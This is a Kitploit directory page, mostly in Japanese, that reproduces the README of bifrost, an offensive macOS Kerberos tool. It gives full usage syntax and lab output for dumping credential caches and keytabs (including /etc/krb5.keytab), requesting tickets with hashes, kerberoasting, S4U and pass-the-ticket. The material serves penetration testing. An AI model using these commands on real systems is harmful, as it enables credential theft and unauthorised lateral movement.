Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
bifrost — macOS Kerberos 向け Heimdal API と連携する Objective-C ライブラリおよびコンソール | Kitploit
ツール/GitHubGitHub/its-a-feature/bifrost
パスワード攻撃エクスプロイトペネトレーションテスト認証レッドチーミング
GitHubits-a-feature/bifrost

bifrost

macOS Kerberos 向け Heimdal API と連携する Objective-C ライブラリおよびコンソール

リポジトリを見る
1581973年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Bifrost```


( \ _ /'___) ( )_ | (_) )(_)| (__ _ __ _ ___ | ,_) | _ <'| || ,__)( '__)/'_\ /',__)| |
| (
) )| || | | | ( () )_, | |_ (__/'()() () \___/'(____/_)

Usage: ./bifrost -action [dump | list | askhash | describe | asktgt | asktgs | s4u | ptt | remove] For dump action: -source [tickets | keytab] for keytab, optional -path to specify a keytab for tickets, optional -name to specify a ccache entry to dump For list action: no other options are necessary For askhash action: -username a.test -password 'mypassword' -domain DOMAIN.COM optionally specify -enctype [aes256 | aes128 | rc4] or get all of them optionally specify -bpassword 'base64 of password' in case there might be issues with parsing or special characters For asktgt action: -username a.test -domain DOMAIN.COM if using a plaintext password, specify -password 'password' if using a hash, specify -enctype [aes256 | aes128 | rc4] -hash [hash_here] optionally specify -tgtEnctype [aes256|aes128|rc4] to request a TGT with a specific encryption type optionally specify -supportAll false to indicate that you want a TGT to match your hash enctype, otherwise will try to get AES256 if using a keytab, specify -enctype and -keytab [keytab path] to pull a specific hash from the keytab optionally specify -tgtEnctype [aes256|aes128|rc4] to request a TGT with a specific encryption type optionally specify -supportAll false to indicate that you want a TGT to match your hash enctype, otherwise will try to get AES256 For describe action: -ticket base64KirbiTicket For asktgs action: -ticket [base64 of TGT] -service [comma separated list of SPNs] optionally specify -connectDomain to connect to a domain other than the one specified in the ticket optionally specify -serviceDomain to request a service ticket in a domain other than the one specified in the ticket optionally specify -kerberoast true to indicate a request for rc4 instead of aes256 For s4u: -ticket [base64 of TGT] -targetUser [target user in current domain, or targetuser@domain for a different domain] -spn [target SPN] (if this isn't specified, just a forwardable S4U2Self ticket is requested as targetUser) optionally specify -connectDomain [domain or host to connect to] For ptt: -ticket [base64 of kirbi ticket] optionally specify -name [name] to import the ticket into a specific credential cache optionally specify -name new to import the ticket into a new credential cache For remove: for tickets: -source tickets -name [name here] (removes an entire ccache) for keytabs: -source keytab -principal [principal name] (removes all entries for that principal) for keytabs: optionally specify -name to not use the default keytab you can't remove a specific ccache principal entry since it seems to not be implemented in heimdal

# Table of Contents
- [Overview](#overview)
- commands
    - [list](#list)
    - [dump](#dump)  
        - [tickets](#tickets)  
        - [keytab](#keytab)  
    - [askhash](#askhash)  
    - [asktgt](#asktgt)
        - [with plaintext](#with-plaintext-password)    
        - [with hash](#with-hash)
        - [with keytab entry](#with-keytab-entry)
    - [describe](#describe)
    - [asktgs](#asktgs)
        - [different domains](#different-domains)
        - [kerberoasting](#kerberoasting)
    - [s4u](#s4u)
    - [ptt](#ptt)
    - [remove](#remove)
        - [credential cache](#credential-cache)
        - [keytab entry](#keytab-entry)
        
## Overview
Bifrost は、macOS 上で Heimdal krb5 API を操作するために設計された Objective-C プロジェクトです。Bifrost は静的ライブラリにコンパイルされます(必要に応じて dylib に変更することも可能です)。bifrostconsole は、Bifrost ライブラリを使用するシンプルなコンソールプロジェクトです。このプロジェクトの目的は、対象マシン上に他のフレームワークやパッケージを必要とせず、ネイティブ API を使用して macOS デバイス上の Kerberos に関するセキュリティテストをより適切に行えるようにすることです。

これは Mac 上でコンパイルする必要があり、テスト目的ですべての人が簡単に利用できるとは限らないため、"compiled_binaries" フォルダにコンソールとライブラリのコンパイル済みバージョンを同梱しています。これらはプリコンパイル済みであるため、強くシグネチャリングされており、個人のテスト目的でのみ使用できることを想定してください。
## list
`-action list` コマンドは、メモリ内のすべての資格情報キャッシュをループし、各キャッシュとその中の各エントリに関する基本情報を表示します。また、デフォルトのキャッシュを `[*]` マーカーで識別し、その他の各キャッシュを `[+]` マーカーで識別します。```
spooky:~ lab_admin$ ./bifrost -action list
 ___         ___                   _     
(  _`\  _  /'___)                 ( )_  
| (_) )(_)| (__  _ __   _     ___ | ,_)  
|  _ <'| || ,__)( '__)/'_`\ /',__)| |   
| (_) )| || |   | |  ( (_) )\__, \| |_ 
(____/'(_)(_)   (_)  `\___/'(____/\__) 


[*] Principal: [email protected]
    Name: API:A74E8799-8173-4D1A-8C7D-AFD2D8B003F3
    Issued             Expires                Principal                    Flags
2019-11-13 18:00:20PST    2019-11-14 04:00:20PST    krbtgt/[email protected]    (forwardable renewable initial pre-auth )
1970-12-31 16:00:00PST    2019-12-13 18:00:21PST    krb5_ccache_conf_data/kcm-status@X-CACHECONF:    ()

dump

-action dump コマンドは、フラグに基づいて keytab または資格情報キャッシュに関する情報を抽出できます。

tickets

チケットを具体的にダンプするには、 -source tickets を使用します。デフォルトでは、既定の資格情報キャッシュのみを反復処理します。既定の資格情報キャッシュは、-action list コマンドを使用し、[*] マーカーで識別されたキャッシュを探すことで特定できます。特定の資格情報キャッシュをダンプするには、-name [name here] フラグを使用します。

各チケットは記述され、base64 Kirbi 形式でダンプされます。この形式は、他のコマンドや Windows 上の他のツールで使用できます。``` spooky:~ lab_admin$ ./bifrost -action dump -source tickets


( \ _ /'___) ( )_ | (_) )(_)| (__ _ __ _ ___ | ,_) | _ <'| || ,__)( '__)/'_\ /',__)| |
| (
) )| || | | | ( () )_, | |_ (/'()() (_) `_/'(___/_)

Client: [email protected] Principal: krbtgt/LAB.[email protected] Key enctype: aes256 Key: DUpykxCguZ9JtWML38nygb5Yyhvd1nGvy+MGReD7sXU= (0D4A729310A0B99F49B5630BDFC9F281BE58CA1BDDD671AFCBE30645E0FBB175) Expires: 2019-11-14 12:00:20 GMT Flags: forwardable renewable initial pre-auth Kirbi: doIFIDCCBRygBgIEAAA<...snip...>TE9DQUw=

Client: [email protected] Principal: krb5_ccache_conf_data/kcm-status@X-CACHECONF: Key enctype: 0 Key: () Expires: 2019-12-14 02:00:21 GMT Flags: Principal type: kcm-status Ticket Data: a3JiNQAAAAEAAAAA

### keytab
keytab キーをダンプするには、`-source keytab` パラメータを使用します。デフォルトでは、root のみが読み取り可能なデフォルトの keytab(`/etc/krb5.keytab`)から情報のダンプを試みます。別の keytab を指定するには、`-path /path/to/keytab` 引数を使用します。

各 keytab エントリが説明され、キーは base64 と hex でダンプされます。```
spooky:~ lab_admin$ ./bifrost -action dump -source keytab -path test
 ___         ___                   _     
(  _`\  _  /'___)                 ( )_  
| (_) )(_)| (__  _ __   _     ___ | ,_)  
|  _ <'| || ,__)( '__)/'_`\ /',__)| |   
| (_) )| || |   | |  ( (_) )\__, \| |_ 
(____/'(_)(_)   (_)  `\___/'(____/\__) 

[*] Resolving keytab path
[+] Successfully opened keytab
[+] principal: [email protected]
    Entry version: 3
    Key enctype: aes256
    Key: 2DE49D76499F89DEA6DFA62D0EA7FEDFD108EC52936740E2450786A92616D1E1
    Timestamp: 2019-11-10 04:58:09 GMT
bash-3.2$ sudo ./bifrost -action dump -source keytab
 ___         ___                   _     
(  _`\  _  /'___)                 ( )_  
| (_) )(_)| (__  _ __   _     ___ | ,_)  
|  _ <'| || ,__)( '__)/'_`\ /',__)| |   
| (_) )| || |   | |  ( (_) )\__, \| |_ 
(____/'(_)(_)   (_)  `\___/'(____/\__)
ツールをダウンロード